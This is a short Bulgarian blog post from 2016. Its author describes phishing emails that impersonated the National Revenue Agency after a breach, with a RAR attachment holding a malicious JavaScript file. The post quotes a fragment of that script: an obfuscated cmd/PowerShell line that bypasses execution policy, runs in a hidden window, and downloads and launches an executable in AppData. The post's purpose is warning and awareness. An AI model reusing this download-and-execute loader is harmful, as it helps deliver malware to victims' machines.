Потребителски вход

Запомни ме | Регистрация
Постинг
07.10.2016 22:24 - Поредния пробив в базата на НАП
Автор: akrachev Категория: Технологии   
Прочетен: 403 Коментари: 0 Гласове:
1


Постингът е бил сред най-популярни в категория в Blog.bg
 Тъй като не гледам телевизия, не разбрах своевременно, че е имало пробив тези дни в системата на НАП и са били изтеглени данни на респондентите, та ми се наложи на практика да се запозная със случая.

Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП"  и подател Национална агенция за приходите

В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото. 

Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll");
if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS  -N^o^prOfi^lE^     -w^indOW^s^tyLe   ^h^iDDen^ (NEW^-ObJEcT    ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...







Гласувай:
1
0



Няма коментари
Търсене

За този блог
Автор: akrachev
Категория: Лични дневници
Прочетен: 220126
Постинги: 167
Коментари: 53
Гласове: 72
Календар
«  Декември, 2018  
ПВСЧПСН
12
3456789
10111213141516
17181920212223
24252627282930
31